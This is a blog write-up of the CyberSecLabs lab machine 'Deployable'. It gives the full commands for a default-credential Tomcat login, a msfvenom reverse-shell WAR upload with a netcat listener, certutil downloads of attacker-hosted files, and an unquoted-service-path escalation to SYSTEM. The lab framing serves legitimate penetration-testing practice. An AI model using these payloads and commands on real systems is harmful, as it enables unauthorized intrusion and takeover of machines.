CyberSecLabs-Deployable

This is my 7th write up and I will be discussing my experience with the machine “Deployable” from CyberSecLabs. CyberSecLabs is a great platform for people who are new to penetration testing and want to boost their skills to take on the OSCP. This was a beginner level Windows machine and I found it quite challenging. This box taught me a lot when it comes to exploiting windows services. Default tomcat credentials are discovered from a 401 error which then leads to a reverse shell war file upload. Then, an unquoted service path exploit lands me into admin.

Image for post
Image for post
Dark shield Deployed

Step 1: Enumeration

I started off with two Nmap scans on this machine and stuck with the results from the first scan. My first scan used default scripts -sC and version detection -sV. The second scan gave me some other open ports that led to a rabbit hole so I stuck with the results from the first scan.

Image for post
Image for post

After enumerating the obvious ports from top to bottom, port 8080 became of interest running tomcat. When visiting http://172.31.1.13:8080 I was presented with the tomcat default configuration page. I clicked on the manager tab and it prompted for a password.

Image for post
Image for post

After a couple of failed attempts I hit cancel and it brought me to a page with a 401 Unauthorized error. The page presented some default credential examples and sure enough when I tested them back on the manager login prompt it worked!

Step 2: Exploitation

Having tomcat manager I saw that we can upload/deploy files. I created a reverse shell WAR file using msfvenom and setup a nc listener to grab the connection when uploaded.

On Kali Machine:

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=yourip LPORT=6666 -f war > sin.warsudo nc -lvp 6666
Image for post
Image for post

Once I uploaded the war file I created with msfvenom I visited the directory with the name of my file.

http://172.31.1.13:8080/sin

Step 3: Post Exploitation

Going back to my kali machine we can see I captured the reverse connection giving me user tomcat.

Image for post
Image for post

After trying different priv-esc enumeration scripts I found winPEAS super helpful.

I pushed it to the box by using the following commands within the same directory my winPEAS batch file resided:

On my Kali Machine:

sudo python -m SimpleHTTPServer 80

On the Windows box:

certutil.exe -urlcache -split -f "http://yourip:80/winPEAS.bat"

I then ran the file on the windows machine:

winPEAS.bat

Unquoted service paths caught my eye when analyzing the script results. When a service is created whose executable path contains spaces and isn’t enclosed within quotes it leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).

Image for post
Image for post

Testing each path by trying to cd into each one until I cannot this lets me know that I can write to that specific path. I tested each one until I hit \Service Files where I could not land into. This let me know that \Deploy Ready is writable.

Example:

cd "C:\Program Files"cd Depl*

I went back to my kali machine and created a reverse shell to upload into this writable directory.

On Kali Machine:

sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=youriphere LPORT=1234 -f exe > sin.exe

Now I followed the same method explained above and pushed the file with my python simple server and grabbed it with certutil but this time I added Service.exe to the end of the command. You may need to kill your last running python server and start it in the directory you made your msfvenom file with.

On my Kali Machine:

sudo python -m SimpleHTTPServer 80

On the Windows box:

certutil.exe -urlcache -split -f "http://yourip:80/sin.exe" Service.exe

Having baked Service.exe to the end of the above command lets us attach to .exe file we made to the service. I then started another netcat listener on my machine but with a different port with the one I specified with the .exe file I made with msfvenom.

On My Kali Machine:

sudo nc -lvp 1234

Now I need to start the service on the windows machine and grab the reverse connection back.

On the Windows Machine:

sc start Deploy

Going back to my machine I grabbed the connection from starting the service granting me full admin access.

Image for post
Image for post
Image for post
Image for post

Written by

🦇

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store